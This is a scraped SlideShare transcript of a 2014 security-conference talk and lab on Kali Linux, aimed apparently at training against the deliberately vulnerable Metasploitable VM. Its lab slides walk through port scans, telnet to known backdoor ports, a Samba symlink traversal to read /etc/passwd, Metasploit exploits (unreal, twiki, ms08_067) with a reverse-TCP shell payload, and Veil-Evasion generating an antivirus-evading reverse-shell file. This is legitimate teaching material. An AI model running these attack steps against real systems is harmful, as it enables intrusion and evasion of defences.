Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
What is Kali Linux? 
Information Security Summit 2014 
Westlake, Ohio
Welcome to ISS 2014
Tony Godfrey is the CEO / Linux Consultant 
of Falconer Technologies (est 2003) specializing in 
Linux. He has written sev...
Welcome 
Side Note: 
I put a lot of extra materials, websites, & 
definitions in the ‘Notes’ section of this PPT.
Intro, Description, How used, Background 
Extra Info, Kali in a Box, Raspberry PI 
Tools, Overview, & Conclusion 
Setting ...
Presentation on Kali Linux 
Intro
Who or What is ‘Kali’?
Kali the mother goddess despite her 
fearful appearance, protects the good 
against the evil. Unlike the other Hindu 
deit...
Hindu Kali
Kali Linux is a Debian-derived Linux 
distribution designed for digital forensics 
and penetration testing. It is maintain...
Kali Linux is the ‘rebirth’ of BackTrack 
Linux. This is a custom distribution 
designed for security testing for all skil...
“Seven years of developing BackTrack 
Linux has taught us a significant amount 
about what we, and the security 
community...
“After a year of silent development, 
we are incredibly proud to announce the 
release and public availability of “Kali 
L...
Kali Linux’s developers would like 
everyone to use Kali Linux. But, Kali is a 
Linux distribution specifically geared 
to...
Kali likes its own dedicated hardware. 
If you are learning about Kali and 
penetration testing (Metaspolitable) then a 
v...
Kali recommends 10gb for the initial 
install, 512MB RAM min, i386/AMD64, 
CD/DVD / USB support. 
Now…if ‘Veil’ is install...
http://www.kali.org/
Other guys?
BackBox is an Ubuntu-based 
distribution developed to perform 
penetration tests and security assessments. 
It provides a ...
Pentoo is a Live CD/USB designed for 
penetration testing and security 
assessment. Based on Gentoo, it is 
provided both ...
BlackBuntu is distribution for 
penetration testing which was specially 
designed for security training students and 
prac...
EnGarde Secure Linux was designed to 
support features suitable for individuals, 
students, security enthusiasts, and thos...
Other guys? A few more….
Presentation on Kali Linux 
Categories & Websites
What’s in the box, Pandora?
Top 10 Security Tools 
Information Gathering 
Vulnerability Analysis 
Web Applications / Password Attacks 
Wireless Attack...
Metapackages also exist
Kali Information 
See ‘Notes’ section in this slide
Getting your pentesting lab ready 
Hacking tutorial 
20 things to do after installing Kali 
Information 
Cracking WEP 
6 R...
Kali & More PenTesting 
See ‘Notes’ section in this slide
PenTest Tools 
Penetration Testing Tools 
PenTestMag 
Chrome as a PenTest Tool 
Firefox as a PenTest Tool 
Kali & More Pen...
Kali-specific Websites 
See ‘Notes’ section in this slide
Kali4Hackers 
Hacking with Kali Linux 
YouTube 
Kali Linux 
Hack with Kali Linux 
Kali-specific Websites
Kali Publications 
See ‘Notes’ section in this slide
Kali Book 
BackTrack to Kali 
Basic Security Testing with Kali 
Kali Linux Assuring Security 
Kali Publications
Do you want to run Kali on tablet or phone? 
http://www.kali.org/how-to/kali-linux-android-linux-deploy/ 
Kali in a box?
Kali in a box? 
Basically…. 
1.Get a tablet 
1. Install ‘Linux Deploy’ 
2. Install Samsung Kies on PC 
3. Tablet - USB Deb...
Do you want to run Kali on a Nexus? 
http://www.kali.org/kali-linux-nethunter/ 
Kali + Nexus = NetHunter
Kali on a Nexus?
How to hack your own network and beef up 
its security with Kali Linux 
http://lifehacker.com/how-to-hack-your-own-network...
Kali & Raspberry PI 
See ‘Notes’ section in this slide
What is Metaspolitable? 
See ‘Notes’ section in this slide
Metasploitable is an intentionally 
vulnerable Linux virtual machine. This VM 
can be used to conduct security training, 
...
Presentation on Kali Linux 
DVD, Tools, Demo
/books 
◦Official Kali Guide 
◦eForensics 
◦Other published materials 
/media 
◦7-Zip, kali_iso, metaspolitable doc, 
SD...
 We’re going to type something 
 We’re going to make a note 
 Might be a question? 
 We’re going to click on something...
 traceroute 
Essentially, ‘tracert’ in Windows 
 traceroute –i eth0 <Target IP> 
It displays the route (path) and measur...
 
nmap –p0-65535 <Target IP> | less 
A security scanner used to discover hosts and services on a 
computer network, thus ...
 
nmap –sS –Pn –A <Target IP> 
A security scanner used to discover hosts and services on a 
computer network – ‘sS’ is st...
 
rpcinfo –p <Target IP> 
A utility makes a Remote Procedure Call (RPC) to an RPC server and reports 
what it finds. It l...
On Kali… 
tcpdump –I eth0 src <Target IP> 
On Metaspolitable… 
ping www.yahoo.com 
open a Browser & go to CNN.com 
tcpdump
On Kali 
 nikto –h <Target IP> 
Its an Open Source (GPL) web server scanner which performs 
comprehensive tests against w...
From Kali 
 whatweb <Target IP> 
 whatweb –v <Target IP> 
 whatweb –a 4 <Target IP> 
WhatWeb recognizes web technologie...
Let’s run Zenmap 
 Applications  Kali Linux 
 Information Gathering 
 DNS Analysis 
 Zenmap 
Zenmap
Let’s run SHODAN 
 Open a browser 
 www.shodanhq.com 
 type in ‘almost anything’ 
 …Be very nervous… 
SHODAN
If you want something more basic…dmitry 
 dmitry –s <domain.com> 
 It gives you site names & IP’s 
dmitry
Presentation on Kali Linux 
Final Thoughts
Thank you for your time. 
Falconer Technologies 
TonyGodfrey@FalconerTechnologies.com 
877 / TUX RULZ or 877 / 889-7859 
T...
Use your powers for good
Thank You
The second part of this slide deck covers more 
tools and hands-on.
Presentation on Kali Linux 
Lab #1 & Prep
- Let’s make a folder called  kali_2014 
- Copy the DVD contents into that folder 
- Install 7-Zip 
- Install VMware Play...
Press <CTRL><Alt> at the same time to 
be released from the current virtual 
environment. You can then do a normal 
<Alt><...
Kali Login  root 
Kali Password  password 
Metaspolitable Login  msfadmin 
Metaspolitable Password  msfadmin 
Download...
 Login  msfadmin 
 Password  msfadmin 
 ifconfig 
 Jot down the IP & Netmask 
 route 
 Jot down the Gateway 
Metas...
Virtual Environment #1 
◦Metaspolitable 
 Go to TERMINAL 
rlogin –l root <IP Address> 
cd /tmp 
ls -l ...vs... ls -la 
r...
 Login  root 
 Password  password 
 ifconfig 
 Jot down the IP & Netmask 
 route 
 Jot down the Gateway 
Kali V/E
Go to: 
Applications  System Tools 
 Preferences  System Settings 
 Display  Resolution: ____ 
Then…[Apply] 
Kali V/E
From the command line, type  
apt-get update && apt-get upgrade 
Note: This has already been done to save time, but shoul...
Presentation on Kali Linux 
Lab #2 – Command Line Tools
Command Line Tools 
Presentation on Kali Linux
 We’re going to type something 
 We’re going to make a note 
 Might be a question? 
 We’re going to click on something...
ping 
 ping 
Packet InterNet Groper 
Port = 8 
Establishes physical connectivity between two entities 
 (from Kali) ping...
top 
 top 
Tells us what services are running, 
processes, memory allocation 
Basically, a live system monitor
df 
 df 
Tells us how much space is available 
or ‘disk free’
du 
 du 
Tells us how much space is taken or 
‘disk used’. 
You can get a shorter report by… 
 ‘du –s’ … (disk used –sum...
free 
 free 
How much ‘free’ memory is available
ls 
 ls 
This is for ‘list’ 
 ls –l (list –long) 
 ls -la (list – long – all attributes)
pwd 
 pwd 
Directory structure 
Means ‘path to working directory’ or 
‘print working directory’
 ps 
Means ‘Process Status’ 
◦aux – auxiliary view 
◦pstree – shows parent/child relationships 
◦Windows – tasklist / tas...
Presentation on Kali Linux 
Lab #3 – CLI & Services
CLI & Services 
Presentation on Kali Linux
 traceroute 
Essentially, ‘tracert’ in Windows 
 traceroute –i eth0 <Target IP> 
It displays the route (path) and measur...
 
nmap –p0-65535 <Target IP> | less 
A security scanner used to discover hosts and services on a 
computer network, thus ...
 
nmap –sS –Pn –A <Target IP> 
A security scanner used to discover hosts and services on a 
computer network – ‘sS’ is st...
 rlogin –l root <Target IP> 
 whoami 
 tcpdump -i eth0 host <Target IP> 
A packet analyzer that runs under the command ...
 
rpcinfo –p <Target IP> 
A utility makes a Remote Procedure Call (RPC) to an RPC server and reports 
what it finds. It l...
 showmount –e <Target IP> 
 showmount –a <Target IP> 
It displays a list of all clients that have remotely mounted a fil...
 telnet <Target IP> 21 
After '220...' 
 user backdoored:) 
 <CTRL><]> 
 quit 
telnet 
Port 20/21 is FTP
 telnet <Target IP> 6200 
After 'Escape character...', 
 id; 
<CTRL><]> 
 quit 
Port 6200 - Oracle Notification Servic...
 telnet <Target IP> 6667 
IRC (Internet Relay Chat) 
Many trojans/backdoors also use this port: Dark Connection Inside, D...
 telnet <Target IP> 1524 
After 'root@meta....', 
 id 
Many attack scripts install a backdoor shell at this port (especi...
Presentation on Kali Linux 
Lab #4 – Working w/Metaspolitable
 smbclient –L <//Target IP> 
 msfconsole 
...wait, wait, wait..., then 
use auxiliary/admin/smb/samba_symlink_traversal ...
 exploit 
...Connecting to the server..... 
...<yadda, yadda, yadda>... 
...Auxiliary module.... 
At the prompt, type  e...
 smbclient //<Target IP>/tmp 
Do you get the 'smb: >' prompt? 
 cd rootfs 
 cd etc 
 more passwd 
Do you get a list of...
On Kali… 
tcpdump –I eth0 src <Target IP> 
On Metaspolitable… 
ping www.yahoo.com 
open a Browser & go to CNN.com 
tcpdump
On Kali 
netdiscover –i eth0 –r <Target IP>/24 
Netdiscover is an active/passive address reconnaissance tool, mainly 
deve...
On Kali 
 nikto –h <Target IP> 
Its an Open Source (GPL) web server scanner which performs 
comprehensive tests against w...
On Kali 
sqlmap –u http://<Target IP> --dbs 
It is an open source penetration testing tool that automates the process of 
...
From Kali – open IceWeasel 
 http://<Target IP>/ 
Research: Multillidae <p. 8> 
The Mutillidae are a family of more than ...
From Kali – open IceWeasel 
 http://<Target IP>/ 
Research: Multillidae <p. 8> 
Mutillidae is a free, open source web app...
From Kali 
 whatweb <Target IP> 
 whatweb –v <Target IP> 
 whatweb –a 4 <Target IP> 
WhatWeb recognizes web technologie...
Presentation on Kali Linux 
Lab #5 - msfconsole
From Kali - msfconsole 
Presentation on Kali Linux
From Kali 
 service postgresql start 
 service metasploit start 
 msfconsole 
Let’s fire up the database (PostGreSql) –...
From [msf>] console 
 help search 
 show exploits 
 search dns 
‘Help Search’ shows all of the options, ‘Show Exploits’...
From [msf>] console 
 search Microsoft 
 search diablo 
 search irc 
 search http 
Let’s try a few more to see what th...
From [msf>] console, search for ‘unreal’ 
 info <exploit> 
 use <exploit> 
 show options 
 LHOST, RHOST, LPORT, RPORT ...
From [msf>] console (ex: unreal) 
 set RHOST <IP Address> 
 show options 
 exploit 
 
msfconsole
From [msf>] console, search for ‘twiki’ 
 info <exploit> 
 use <exploit> 
 show options 
 LHOST, RHOST, LPORT, RPORT 
...
From [msf>] console (ex: ‘twiki’) 
 set RHOST <IP Address> 
 show options 
 exploit 
 
msfconsole
From [msf>] console, (target: Win XP) 
 use exploit/windows/smb/ms08_067_netapi 
 show options 
 show targets 
 set ta...
From [msf>] console, (target: Win XP) 
 show options 
 show advanced 
 show targets 
 show payloads 
msfconsole
From [msf>] console, (target: Win XP) 
 set payload windows/shell_reverse_tcp 
 show options 
 set LHOST <Kali IP Addre...
From [msf>] console, (target: Win XP) 
 show options 
 exploit 
 Any errors? 
 
msfconsole
Presentation on Kali Linux 
Lab #6 – more GUI
From Kali – more GUI 
Presentation on Kali Linux
Let’s run Zenmap 
 Applications  Kali Linux 
 Information Gathering 
 DNS Analysis 
 Zenmap 
Zenmap
Let’s run SHODAN 
 Open a browser 
 www.shodanhq.com 
 type in ‘almost anything’ 
 …Be very nervous… 
SHODAN
Let’s run FERN 
 Kali Linux 
 Wireless Attacks 
 Wireless Tools 
 fern-wifi-cracker 
FERN
Kali has many built-in tools, but you 
can always install more (Debian-based). 
But, you may always wish to add more 
such...
Let’s run recon-ng… 
 cd /opt/recon-ng 
 /usr/bin/python recon-ng 
 show modules 
 recon/hosts/gather/http/web/google_...
Let’s run recon-ng… 
 set DOMAIN <domain.com> 
 run (…let this run awhile…) 
 back (…previous level…) 
 show modules 
...
Let’s run recon-ng… 
 use reporting/csv 
 run 
 Will add your new information to 
/usr/share/recon-ng/workspaces/defaul...
If you want something more basic…dmitry 
 dmitry –s <domain.com> 
 It gives you site names & IP’s 
dmitry
veil 
Kali has many built-in tools, but you 
can always install even more (Debian-based). 
You may always wish to add more...
Let’s run veil 
veil 
 veil-evasion 
 list (available payloads list) 
 use 13 (powershell/VirtualAlloc) 
 generate
Let’s run veil 
veil 
 1 (msfvenom) 
 [ENTER] (accept default) 
 Value for LHOST (Target IP) 
 Value for LPORT (ex: 40...
Let’s run veil 
veil 
 Output name (“Squatch”) 
 It will store this new batch file to 
the  /usr/share/veil/output/sour...
Presentation on Kali Linux 
Final Thoughts
Thank you for your time. 
Falconer Technologies 
TonyGodfrey@FalconerTechnologies.com 
877 / TUX RULZ or 877 / 889-7859 
T...
Use your powers for good
Thank You
Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014
Upcoming SlideShare
Loading in …5
×

Kali Linux - Falconer - ISS 2014

2,248 views

Published on

This is a presentation and how-to I gave at the Information Security Summit 2014.

Published in: Technology
  • Be the first to comment

Kali Linux - Falconer - ISS 2014

  1. 1. What is Kali Linux? Information Security Summit 2014 Westlake, Ohio
  2. 2. Welcome to ISS 2014
  3. 3. Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and Welcome System Forensics.
  4. 4. Welcome Side Note: I put a lot of extra materials, websites, & definitions in the ‘Notes’ section of this PPT.
  5. 5. Intro, Description, How used, Background Extra Info, Kali in a Box, Raspberry PI Tools, Overview, & Conclusion Setting up the Environments CLI 101 / Tools 101 Kali 101, 201, & 301 Overview of Presentation
  6. 6. Presentation on Kali Linux Intro
  7. 7. Who or What is ‘Kali’?
  8. 8. Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively! Who is Kali? Anu Yadavalli
  9. 9. Hindu Kali
  10. 10. Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution. What is Kali Linux?
  11. 11. Kali Linux is the ‘rebirth’ of BackTrack Linux. This is a custom distribution designed for security testing for all skill levels from novice to expert. It is the largest collection of wireless hacking, server exploiting, web application assessing, social-engineering tools available in a single Linux distribution. BackTrack?
  12. 12. “Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.” Developers - March 12, 2013
  13. 13. “After a year of silent development, we are incredibly proud to announce the release and public availability of “Kali Linux“, the most advanced, robust, and stable penetration testing distribution to date. Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux.” Developers - March 12, 2013
  14. 14. Kali Linux’s developers would like everyone to use Kali Linux. But, Kali is a Linux distribution specifically geared towards professional penetration testing and security auditing and as such. It is NOT a recommended distribution for those unfamiliar with Linux. Warning!
  15. 15. Kali likes its own dedicated hardware. If you are learning about Kali and penetration testing (Metaspolitable) then a virtualized environment may be a consideration. VMware Player 5 works well and set the RAM to 1gb. Hardware / Software
  16. 16. Kali recommends 10gb for the initial install, 512MB RAM min, i386/AMD64, CD/DVD / USB support. Now…if ‘Veil’ is installed (+ 10gb) and doing the updates/upgrades (+ 5gb), and don’t forget the Alfa antenna. Hardware / Software
  17. 17. http://www.kali.org/
  18. 18. Other guys?
  19. 19. BackBox is an Ubuntu-based distribution developed to perform penetration tests and security assessments. It provides a minimal yet complete desktop environment, thanks to its own software repositories, which are always updated to the latest stable versions of the most often used and best-known ethical hacking tools. Other guys? BackBox
  20. 20. Pentoo is a Live CD/USB designed for penetration testing and security assessment. Based on Gentoo, it is provided both as 32/64 bit installable livecd. It features packet injection patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment. Other guys? Pentoo
  21. 21. BlackBuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security. Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10. Other guys? BlackBuntu
  22. 22. EnGarde Secure Linux was designed to support features suitable for individuals, students, security enthusiasts, and those wishing to evaluate the level of security and ease of management available in Guardian Digital enterprise products. Other guys? EnGarde
  23. 23. Other guys? A few more….
  24. 24. Presentation on Kali Linux Categories & Websites
  25. 25. What’s in the box, Pandora?
  26. 26. Top 10 Security Tools Information Gathering Vulnerability Analysis Web Applications / Password Attacks Wireless Attacks / Exploitation Tools Sniffing/Spoofing / Maintaining Access Reverse Engineering Stress Testing / Hardware Hacking Forensics / Reporting Tools System Services There are several categories
  27. 27. Metapackages also exist
  28. 28. Kali Information See ‘Notes’ section in this slide
  29. 29. Getting your pentesting lab ready Hacking tutorial 20 things to do after installing Kali Information Cracking WEP 6 Resources & Tutorials on Kali
  30. 30. Kali & More PenTesting See ‘Notes’ section in this slide
  31. 31. PenTest Tools Penetration Testing Tools PenTestMag Chrome as a PenTest Tool Firefox as a PenTest Tool Kali & More PenTesting
  32. 32. Kali-specific Websites See ‘Notes’ section in this slide
  33. 33. Kali4Hackers Hacking with Kali Linux YouTube Kali Linux Hack with Kali Linux Kali-specific Websites
  34. 34. Kali Publications See ‘Notes’ section in this slide
  35. 35. Kali Book BackTrack to Kali Basic Security Testing with Kali Kali Linux Assuring Security Kali Publications
  36. 36. Do you want to run Kali on tablet or phone? http://www.kali.org/how-to/kali-linux-android-linux-deploy/ Kali in a box?
  37. 37. Kali in a box? Basically…. 1.Get a tablet 1. Install ‘Linux Deploy’ 2. Install Samsung Kies on PC 3. Tablet - USB Debugging ON 4. Install SuperOneClick on PC 5. Wait 5 minutes… 6.Done
  38. 38. Do you want to run Kali on a Nexus? http://www.kali.org/kali-linux-nethunter/ Kali + Nexus = NetHunter
  39. 39. Kali on a Nexus?
  40. 40. How to hack your own network and beef up its security with Kali Linux http://lifehacker.com/how-to-hack-your-own-network-and-beef- up-its-security-w-1649785071 Kali & Lifehacker
  41. 41. Kali & Raspberry PI See ‘Notes’ section in this slide
  42. 42. What is Metaspolitable? See ‘Notes’ section in this slide
  43. 43. Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. The default login and password is msfadmin:msfadmin. Metaspolitable?
  44. 44. Presentation on Kali Linux DVD, Tools, Demo
  45. 45. /books ◦Official Kali Guide ◦eForensics ◦Other published materials /media ◦7-Zip, kali_iso, metaspolitable doc, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager /PPT What’s on the DVD?
  46. 46.  We’re going to type something  We’re going to make a note  Might be a question?  We’re going to click on something  Recon  Attack Legend
  47. 47.  traceroute Essentially, ‘tracert’ in Windows  traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network traceroute
  48. 48.  nmap –p0-65535 <Target IP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network nmap
  49. 49.  nmap –sS –Pn –A <Target IP> A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack. nmap
  50. 50.  rpcinfo –p <Target IP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host. rpcinfo
  51. 51. On Kali… tcpdump –I eth0 src <Target IP> On Metaspolitable… ping www.yahoo.com open a Browser & go to CNN.com tcpdump
  52. 52. On Kali  nikto –h <Target IP> Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. nikto
  53. 53. From Kali  whatweb <Target IP>  whatweb –v <Target IP>  whatweb –a 4 <Target IP> WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. whatweb
  54. 54. Let’s run Zenmap  Applications  Kali Linux  Information Gathering  DNS Analysis  Zenmap Zenmap
  55. 55. Let’s run SHODAN  Open a browser  www.shodanhq.com  type in ‘almost anything’  …Be very nervous… SHODAN
  56. 56. If you want something more basic…dmitry  dmitry –s <domain.com>  It gives you site names & IP’s dmitry
  57. 57. Presentation on Kali Linux Final Thoughts
  58. 58. Thank you for your time. Falconer Technologies TonyGodfrey@FalconerTechnologies.com 877 / TUX RULZ or 877 / 889-7859 Thank you
  59. 59. Use your powers for good
  60. 60. Thank You
  61. 61. The second part of this slide deck covers more tools and hands-on.
  62. 62. Presentation on Kali Linux Lab #1 & Prep
  63. 63. - Let’s make a folder called  kali_2014 - Copy the DVD contents into that folder - Install 7-Zip - Install VMware Player Let’s make sure the virtual environments are working and can ‘ping’ each other Getting Ready…
  64. 64. Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications. VMware Player
  65. 65. Kali Login  root Kali Password  password Metaspolitable Login  msfadmin Metaspolitable Password  msfadmin Download Metaspolitable from: http://sourceforge.net/projects/metasploitable/ Logins / Passwords
  66. 66.  Login  msfadmin  Password  msfadmin  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway Metaspolitable V/E
  67. 67. Virtual Environment #1 ◦Metaspolitable  Go to TERMINAL rlogin –l root <IP Address> cd /tmp ls -l ...vs... ls -la rm .X0-lock  startx Metaspolitable V/E
  68. 68.  Login  root  Password  password  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway Kali V/E
  69. 69. Go to: Applications  System Tools  Preferences  System Settings  Display  Resolution: ____ Then…[Apply] Kali V/E
  70. 70. From the command line, type  apt-get update && apt-get upgrade Note: This has already been done to save time, but should be done after a new installation. Kali Updating
  71. 71. Presentation on Kali Linux Lab #2 – Command Line Tools
  72. 72. Command Line Tools Presentation on Kali Linux
  73. 73.  We’re going to type something  We’re going to make a note  Might be a question?  We’re going to click on something  Recon  Attack Legend
  74. 74. ping  ping Packet InterNet Groper Port = 8 Establishes physical connectivity between two entities  (from Kali) ping <Target IP> Did it echo back?
  75. 75. top  top Tells us what services are running, processes, memory allocation Basically, a live system monitor
  76. 76. df  df Tells us how much space is available or ‘disk free’
  77. 77. du  du Tells us how much space is taken or ‘disk used’. You can get a shorter report by…  ‘du –s’ … (disk used –summary)
  78. 78. free  free How much ‘free’ memory is available
  79. 79. ls  ls This is for ‘list’  ls –l (list –long)  ls -la (list – long – all attributes)
  80. 80. pwd  pwd Directory structure Means ‘path to working directory’ or ‘print working directory’
  81. 81.  ps Means ‘Process Status’ ◦aux – auxiliary view ◦pstree – shows parent/child relationships ◦Windows – tasklist / taskkill Kill - Stops a process (ex: kill PID) ps / ps aux / pstree
  82. 82. Presentation on Kali Linux Lab #3 – CLI & Services
  83. 83. CLI & Services Presentation on Kali Linux
  84. 84.  traceroute Essentially, ‘tracert’ in Windows  traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network traceroute
  85. 85.  nmap –p0-65535 <Target IP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network nmap
  86. 86.  nmap –sS –Pn –A <Target IP> A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack. nmap
  87. 87.  rlogin –l root <Target IP>  whoami  tcpdump -i eth0 host <Target IP> A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. rlogin (from Metaspolitable)
  88. 88.  rpcinfo –p <Target IP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host. rpcinfo
  89. 89.  showmount –e <Target IP>  showmount –a <Target IP> It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter. showmount
  90. 90.  telnet <Target IP> 21 After '220...'  user backdoored:)  <CTRL><]>  quit telnet Port 20/21 is FTP
  91. 91.  telnet <Target IP> 6200 After 'Escape character...',  id; <CTRL><]>  quit Port 6200 - Oracle Notification Service remote port Oracle Application Server telnet
  92. 92.  telnet <Target IP> 6667 IRC (Internet Relay Chat) Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO. telnet
  93. 93.  telnet <Target IP> 1524 After 'root@meta....',  id Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP. telnet
  94. 94. Presentation on Kali Linux Lab #4 – Working w/Metaspolitable
  95. 95.  smbclient –L <//Target IP>  msfconsole ...wait, wait, wait..., then use auxiliary/admin/smb/samba_symlink_traversal  set RHOST <Target IP>  set SMBSHARE tmp smbclient
  96. 96.  exploit ...Connecting to the server..... ...<yadda, yadda, yadda>... ...Auxiliary module.... At the prompt, type  exit smbclient
  97. 97.  smbclient //<Target IP>/tmp Do you get the 'smb: >' prompt?  cd rootfs  cd etc  more passwd Do you get a list of all user accts? smbclient
  98. 98. On Kali… tcpdump –I eth0 src <Target IP> On Metaspolitable… ping www.yahoo.com open a Browser & go to CNN.com tcpdump
  99. 99. On Kali netdiscover –i eth0 –r <Target IP>/24 Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without DHCP server, when you are wardriving. It can be also used on hub/switched networks. netdiscover
  100. 100. On Kali  nikto –h <Target IP> Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. nikto
  101. 101. On Kali sqlmap –u http://<Target IP> --dbs It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. sqlmap
  102. 102. From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> The Mutillidae are a family of more than 3,000 species of wasps (despite the names) whose wingless females resemble large, hairy ants. Their common name ‘velvet ant’ refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold. Wasp Services
  103. 103. From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application Web Services
  104. 104. From Kali  whatweb <Target IP>  whatweb –v <Target IP>  whatweb –a 4 <Target IP> WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. whatweb
  105. 105. Presentation on Kali Linux Lab #5 - msfconsole
  106. 106. From Kali - msfconsole Presentation on Kali Linux
  107. 107. From Kali  service postgresql start  service metasploit start  msfconsole Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole We will then take a look at the built-in exploit tools msfconsole
  108. 108. From [msf>] console  help search  show exploits  search dns ‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits. msfconsole
  109. 109. From [msf>] console  search Microsoft  search diablo  search irc  search http Let’s try a few more to see what they do…. msfconsole
  110. 110. From [msf>] console, search for ‘unreal’  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT msfconsole
  111. 111. From [msf>] console (ex: unreal)  set RHOST <IP Address>  show options  exploit  msfconsole
  112. 112. From [msf>] console, search for ‘twiki’  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT msfconsole
  113. 113. From [msf>] console (ex: ‘twiki’)  set RHOST <IP Address>  show options  exploit  msfconsole
  114. 114. From [msf>] console, (target: Win XP)  use exploit/windows/smb/ms08_067_netapi  show options  show targets  set target 2 msfconsole
  115. 115. From [msf>] console, (target: Win XP)  show options  show advanced  show targets  show payloads msfconsole
  116. 116. From [msf>] console, (target: Win XP)  set payload windows/shell_reverse_tcp  show options  set LHOST <Kali IP Address>  set RHOST <Target IP Address> msfconsole
  117. 117. From [msf>] console, (target: Win XP)  show options  exploit  Any errors?  msfconsole
  118. 118. Presentation on Kali Linux Lab #6 – more GUI
  119. 119. From Kali – more GUI Presentation on Kali Linux
  120. 120. Let’s run Zenmap  Applications  Kali Linux  Information Gathering  DNS Analysis  Zenmap Zenmap
  121. 121. Let’s run SHODAN  Open a browser  www.shodanhq.com  type in ‘almost anything’  …Be very nervous… SHODAN
  122. 122. Let’s run FERN  Kali Linux  Wireless Attacks  Wireless Tools  fern-wifi-cracker FERN
  123. 123. Kali has many built-in tools, but you can always install more (Debian-based). But, you may always wish to add more such as recon-ng. recon-ng automated info gathering and network reconnaissance. recon-ng
  124. 124. Let’s run recon-ng…  cd /opt/recon-ng  /usr/bin/python recon-ng  show modules  recon/hosts/gather/http/web/google_site recon-ng
  125. 125. Let’s run recon-ng…  set DOMAIN <domain.com>  run (…let this run awhile…)  back (…previous level…)  show modules recon-ng
  126. 126. Let’s run recon-ng…  use reporting/csv  run  Will add your new information to /usr/share/recon-ng/workspaces/default recon-ng
  127. 127. If you want something more basic…dmitry  dmitry –s <domain.com>  It gives you site names & IP’s dmitry
  128. 128. veil Kali has many built-in tools, but you can always install even more (Debian-based). You may always wish to add more such as veil. veil Remote shell payload generator that can bypass many anti-virus programs.
  129. 129. Let’s run veil veil  veil-evasion  list (available payloads list)  use 13 (powershell/VirtualAlloc)  generate
  130. 130. Let’s run veil veil  1 (msfvenom)  [ENTER] (accept default)  Value for LHOST (Target IP)  Value for LPORT (ex: 4000)
  131. 131. Let’s run veil veil  Output name (“Squatch”)  It will store this new batch file to the  /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.
  132. 132. Presentation on Kali Linux Final Thoughts
  133. 133. Thank you for your time. Falconer Technologies TonyGodfrey@FalconerTechnologies.com 877 / TUX RULZ or 877 / 889-7859 Thank you
  134. 134. Use your powers for good
  135. 135. Thank You

×